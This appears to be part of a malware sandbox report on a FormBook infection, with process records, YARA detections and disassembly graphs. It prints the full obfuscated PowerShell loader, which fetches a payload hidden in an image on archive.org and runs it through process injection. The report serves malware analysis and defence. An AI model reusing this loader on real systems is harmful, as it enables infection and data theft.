                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                    Imagebase:0x7ff6e3d50000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:03:59:56
                                                    Start date:10/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:03:59:58
                                                    Start date:10/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))"
                                                    Imagebase:0x7ff6e3d50000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:04:00:06
                                                    Start date:10/10/2024
                                                    Path:C:\Windows\SysWOW64\appidtel.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\appidtel.exe"
                                                    Imagebase:0xcc0000
                                                    File size:20'992 bytes
                                                    MD5 hash:2C04FB942B2735073D75063E9FFBF50C
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:04:00:47
                                                    Start date:10/10/2024
                                                    Path:C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe"
                                                    Imagebase:0x130000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:11
                                                    Start time:04:00:48
                                                    Start date:10/10/2024
                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\dllhost.exe"
                                                    Imagebase:0x870000
                                                    File size:19'256 bytes
                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:12
                                                    Start time:04:01:01
                                                    Start date:10/10/2024
                                                    Path:C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe"
                                                    Imagebase:0x130000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:13
                                                    Start time:04:01:13
                                                    Start date:10/10/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff728280000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Reset < >
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.2447760656.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                      • Instruction ID: 6e374bd9570e1b9cb0c875531fc409f51556b48d2f0797013b42f0dbfba11436
                                                      • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                      • Instruction Fuzzy Hash: B601677121CB0D8FD744EF0CE491AA6B7E0FB95364F10056DE58AC3651D636E882CB45

                                                      Execution Graph

                                                      Execution Coverage:2%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:12
                                                      Total number of Limit Nodes:0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 10 7ffd34842fc9 11 7ffd34842fce-7ffd34842ff1 10->11 14 7ffd34842ff3-7ffd34842ff9 11->14 15 7ffd34842f81-7ffd34842f9c 11->15 17 7ffd34843024-7ffd34843051 14->17 18 7ffd34842ffb-7ffd34843022 14->18 15->10 23 7ffd34843054-7ffd34843065 17->23 24 7ffd34843053 17->24 18->17 25 7ffd34843068-7ffd348430f9 23->25 26 7ffd34843067 23->26 24->23 28 7ffd348430ff-7ffd34843109 25->28 29 7ffd34843226-7ffd3484327a 25->29 26->25 30 7ffd34843122-7ffd34843127 28->30 31 7ffd3484310b-7ffd34843120 28->31 49 7ffd3484327c-7ffd34843282 29->49 50 7ffd3484320a-7ffd34843223 29->50 32 7ffd3484312d-7ffd34843130 30->32 33 7ffd348431c3-7ffd348431cd 30->33 31->30 36 7ffd34843132-7ffd34843145 32->36 37 7ffd34843179 32->37 39 7ffd348431cf-7ffd348431dd 33->39 40 7ffd348431de-7ffd34843208 33->40 36->29 48 7ffd3484314b-7ffd34843155 36->48 43 7ffd3484317b-7ffd3484317d 37->43 40->50 43->33 47 7ffd3484317f-7ffd34843182 43->47 47->33 52 7ffd34843184-7ffd3484319a 47->52 53 7ffd3484316e-7ffd34843177 48->53 54 7ffd34843157-7ffd34843164 48->54 58 7ffd348432ad-7ffd348432d7 49->58 59 7ffd34843284-7ffd348432ab 49->59 50->29 61 7ffd348431b3-7ffd348431c2 52->61 62 7ffd3484319c-7ffd348431a9 52->62 53->43 54->53 63 7ffd34843166-7ffd3484316c 54->63 71 7ffd348432de-7ffd348432ef 58->71 72 7ffd348432d9 58->72 59->58 62->61 67 7ffd348431ab-7ffd348431b1 62->67 63->53 67->61 75 7ffd348432f1 71->75 76 7ffd348432f6-7ffd3484338f 71->76 72->71 74 7ffd348432db 72->74 74->71 75->76 77 7ffd348432f3 75->77 79 7ffd34843395-7ffd3484339f 76->79 80 7ffd34843529-7ffd3484357f 76->80 77->76 81 7ffd348433a1-7ffd348433af 79->81 82 7ffd348433b9-7ffd348433bf 79->82 103 7ffd3484350f-7ffd34843526 80->103 104 7ffd34843581-7ffd34843587 80->104 81->82 92 7ffd348433b1-7ffd348433b7 81->92 83 7ffd348434be-7ffd348434c8 82->83 84 7ffd348433c5-7ffd348433c8 82->84 90 7ffd348434db-7ffd3484350e 83->90 91 7ffd348434ca-7ffd348434da 83->91 87 7ffd34843411 84->87 88 7ffd348433ca-7ffd348433dd 84->88 94 7ffd34843413-7ffd34843415 87->94 88->80 101 7ffd348433e3-7ffd348433ed 88->101 90->103 92->82 94->83 98 7ffd3484341b-7ffd3484341e 94->98 98->83 102 7ffd34843424-7ffd34843427 98->102 105 7ffd348433ef-7ffd34843404 101->105 106 7ffd34843406-7ffd3484340f 101->106 102->83 107 7ffd3484342d-7ffd3484346b 102->107 103->80 112 7ffd348435b2-7ffd348435d5 104->112 113 7ffd34843589-7ffd348435b0 104->113 105->106 106->94 107->83 124 7ffd3484346d-7ffd34843473 107->124 122 7ffd348435e1-7ffd348435ed 112->122 123 7ffd348435d7-7ffd348435dd 112->123 113->112 125 7ffd348435ef-7ffd348435f5 122->125 126 7ffd348435f9-7ffd34843674 122->126 123->122 127 7ffd34843492-7ffd348434a8 124->127 128 7ffd34843475-7ffd34843490 124->128 125->126 133 7ffd34843676-7ffd348436b8 126->133 134 7ffd348436bb-7ffd348436c5 126->134 132 7ffd348434ae-7ffd348434bd 127->132 128->127 133->134 136 7ffd348436d0-7ffd3484371b 134->136 137 7ffd348436c7-7ffd348436cf 134->137
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2386593948.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2
                                                      • API String ID: 0-450215437
                                                      • Opcode ID: d14f85f02e6c7e3db3e356eaca447f847d5e2978091d479dc706d686fd6ea5fa
                                                      • Instruction ID: 04a76f0934f199546a32b4f5c26dd4af59cf916a736e0321c16ed3d4a064be9d
                                                      • Opcode Fuzzy Hash: d14f85f02e6c7e3db3e356eaca447f847d5e2978091d479dc706d686fd6ea5fa
                                                      • Instruction Fuzzy Hash: 57522622B0DBC90FE756976858A51B57FE1EF5B320B4901FFD589C72A3D918AC06C342

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2385718361.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID: ?^_H
                                                      • API String ID: 963392458-2852830312
                                                      • Opcode ID: 7f94a341d8c6fa6b76fb3d472394224e90460230824062d2ba9565cfe62f56de
                                                      • Instruction ID: ca341ba7ba19d0e3c30c3775854c7a5ae5d0c61387a66f1497dec9af73fc016b
                                                      • Opcode Fuzzy Hash: 7f94a341d8c6fa6b76fb3d472394224e90460230824062d2ba9565cfe62f56de
                                                      • Instruction Fuzzy Hash: BD414D3191CA18CFDB54DF58D896BE9B7F1FB99310F50429AD04DA3241CA34B9828FC2

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 145 7ffd3477f524-7ffd3477f52b 146 7ffd3477f52d-7ffd3477f535 145->146 147 7ffd3477f536-7ffd3477f5c0 145->147 146->147 149 7ffd3477f5c2-7ffd3477f5c7 147->149 150 7ffd3477f5ca-7ffd3477f60f WriteProcessMemory 147->150 149->150 151 7ffd3477f611 150->151 152 7ffd3477f617-7ffd3477f641 150->152 151->152
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2385718361.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: e24a9584447b0d2bb2ffbfc2b6dd36248a2c7a9592d344de554e34cb8b7da872
                                                      • Instruction ID: c889e16a6ce610351c68c00a1f53ba4b5786bf2b0b2d8e6bf3b8c89524828ca7
                                                      • Opcode Fuzzy Hash: e24a9584447b0d2bb2ffbfc2b6dd36248a2c7a9592d344de554e34cb8b7da872
                                                      • Instruction Fuzzy Hash: B431B97191CB488FDB18DF58D8456F97BE0FB5A311F04426FD089D3152DB74A846CB92

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 153 7ffd3477f215-7ffd3477f221 154 7ffd3477f223-7ffd3477f22b 153->154 155 7ffd3477f22c-7ffd3477f2b5 153->155 154->155 157 7ffd3477f2bf-7ffd3477f2f1 Wow64SetThreadContext 155->157 158 7ffd3477f2b7-7ffd3477f2bc 155->158 159 7ffd3477f2f3 157->159 160 7ffd3477f2f9-7ffd3477f320 157->160 158->157 159->160
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2385718361.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 1151eb7215852f9ab1d6a3b483582fb6de50977b4d29ecd45fccec06db429a42
                                                      • Instruction ID: be44ed97f6828b5c357a0ceca292bd63c8915b4a50790b9ac6e71de60d894c7d
                                                      • Opcode Fuzzy Hash: 1151eb7215852f9ab1d6a3b483582fb6de50977b4d29ecd45fccec06db429a42
                                                      • Instruction Fuzzy Hash: 2641043190D7888FDB16DF689C856E97FE0EF57321F08429BD448C7196DB64A406CB92

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 161 7ffd3477f6e9-7ffd3477f789 ResumeThread 163 7ffd3477f791-7ffd3477f7ad 161->163 164 7ffd3477f78b 161->164 164->163
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2385718361.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: ad662eabc6e106ec29fc552bdaac9fae236670a2a33a72584d093c51560b8f58
                                                      • Instruction ID: 358b5da18b683c168af611b4d8127a68a693b500de398951b5059a017c8877a9
                                                      • Opcode Fuzzy Hash: ad662eabc6e106ec29fc552bdaac9fae236670a2a33a72584d093c51560b8f58
                                                      • Instruction Fuzzy Hash: 4321057050CA4C9FDB59DB68D84ABF9BFE0EBA6321F00411FD049C3552CB606856CB91

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 165 7ffd348424be-7ffd34842544 167 7ffd34842733-7ffd34842785 165->167 168 7ffd3484254a-7ffd34842554 165->168 190 7ffd34842787-7ffd3484278d 167->190 191 7ffd34842715-7ffd34842730 167->191 169 7ffd3484256d-7ffd34842572 168->169 170 7ffd34842556-7ffd34842563 168->170 173 7ffd348426d4-7ffd348426de 169->173 174 7ffd34842578-7ffd3484257b 169->174 170->169 179 7ffd34842565-7ffd3484256b 170->179 175 7ffd348426e0-7ffd348426ec 173->175 176 7ffd348426ed-7ffd34842713 173->176 177 7ffd3484257d-7ffd34842586 174->177 178 7ffd34842592-7ffd34842596 174->178 176->191 177->178 178->173 185 7ffd3484259c-7ffd348425d3 178->185 179->169 203 7ffd348425f7 185->203 204 7ffd348425d5-7ffd348425f5 185->204 194 7ffd3484278f-7ffd348427b6 190->194 195 7ffd348427b8-7ffd348427c4 190->195 191->167 194->195 197 7ffd348427c9-7ffd348427e5 195->197 208 7ffd348427e8-7ffd348427f9 197->208 209 7ffd348427e7 197->209 205 7ffd348425f9-7ffd348425fb 203->205 204->205 205->173 207 7ffd34842601-7ffd34842604 205->207 211 7ffd34842606-7ffd34842619 207->211 212 7ffd3484261b 207->212 213 7ffd348427fc-7ffd3484280a 208->213 214 7ffd348427fb 208->214 209->208 218 7ffd3484261d-7ffd3484261f 211->218 212->218 213->197 216 7ffd3484280b-7ffd34842812 213->216 214->213 218->173 220 7ffd34842625-7ffd3484265f 218->220 225 7ffd34842661-7ffd3484266e 220->225 226 7ffd34842678-7ffd3484267e 220->226 225->226 231 7ffd34842670-7ffd34842676 225->231 227 7ffd34842680-7ffd34842698 226->227 228 7ffd3484269a-7ffd3484269d 226->228 227->228 232 7ffd348426a4-7ffd348426ad 228->232 231->226 235 7ffd348426af-7ffd348426c4 232->235 236 7ffd348426c6-7ffd348426d3 232->236 235->236
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2386593948.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2e8b9cc3ec801b883f50edae87404125e157ad0601afa7b28419561d51887cb
                                                      • Instruction ID: 587f06acb6698284b54140c6059c197638fb88df72cf6731516d076f3c12f584
                                                      • Opcode Fuzzy Hash: c2e8b9cc3ec801b883f50edae87404125e157ad0601afa7b28419561d51887cb
                                                      • Instruction Fuzzy Hash: 9EB12422B0EA860FE79A976808B52B57BD1EF5B394B0901BFD14DC72E3DD0CA8059351

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2386593948.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bdd80bdd1ac96494414f5ff944a7d5c086d78f5143768ac6b2bb614008248c95
                                                      • Instruction ID: 4fa1b24d9bb6a64e25d4a5dd6dc5eedf275f0f8eeae0fbb9da24f81d58eb08d1
                                                      • Opcode Fuzzy Hash: bdd80bdd1ac96494414f5ff944a7d5c086d78f5143768ac6b2bb614008248c95
                                                      • Instruction Fuzzy Hash: 3941A352F1EA870BF7D9972804F52B96682AF9E390B98017ED64DC32D2DD0DA8456301

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2386593948.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f804c6b8d469f38b55e93f977e660a3ed48da71572a56e648472467f2731cb4f
                                                      • Instruction ID: 6c71d90f2f9efcfb8bf1416ad3c9556c9b67f6b651e3ece23ad49f9e6197f59f
                                                      • Opcode Fuzzy Hash: f804c6b8d469f38b55e93f977e660a3ed48da71572a56e648472467f2731cb4f
                                                      • Instruction Fuzzy Hash: 4421F833B0CA290FEBB4975C64A55F8B3C2EB9D3A075401B7C90DC3296DD19AC5253D0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 320 7ffd34842926-7ffd34842930 321 7ffd34842932-7ffd3484293f 320->321 322 7ffd3484294c-7ffd34842959 320->322 321->322 325 7ffd34842941-7ffd3484294a 321->325 326 7ffd3484296d-7ffd3484297d 322->326 327 7ffd3484295b-7ffd3484296a 322->327 325->322 330 7ffd3484297f-7ffd3484298d 326->330 331 7ffd34842991-7ffd3484299a 326->331 327->326 330->331 334 7ffd348429a1-7ffd348429aa 331->334 335 7ffd348429c3-7ffd348429d2 334->335 336 7ffd348429ac-7ffd348429b9 334->336 336->335 338 7ffd348429bb-7ffd348429c1 336->338 338->335
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2386593948.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dcae5356819892fae872ac52374116c5e8887c23be390ca5db8b8d201cd55ecc
                                                      • Instruction ID: 788562f5656fa3a86ca82bfa20d66e15c074de1931d30f7cc00d97399d01d136
                                                      • Opcode Fuzzy Hash: dcae5356819892fae872ac52374116c5e8887c23be390ca5db8b8d201cd55ecc
                                                      • Instruction Fuzzy Hash: D1212613F1DB1A0BF3B5968C38B0AB496C1EF9A390B5801BAC20DC33D7DC09AC125244

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 379 7ffd34842ef1-7ffd34842f0f 381 7ffd34842f10-7ffd34842f19 379->381 382 7ffd34842f32-7ffd34842f3f 381->382 383 7ffd34842f1b-7ffd34842f28 381->383 383->382 385 7ffd34842f2a-7ffd34842f30 383->385 385->382
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2386593948.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fe690b6a403bf5326e775febf63be8b49baba9c0550f1afcae3819ed74c498a
                                                      • Instruction ID: e9187af279ac308a77c9a5311022d960dc59de22fd4b41d882a94a6319721300
                                                      • Opcode Fuzzy Hash: 2fe690b6a403bf5326e775febf63be8b49baba9c0550f1afcae3819ed74c498a
                                                      • Instruction Fuzzy Hash: 45F0E263F4DA5D0BE3B1A28C24A61F463C2DBA93A07944173CA4CC3352DC096C6543A0

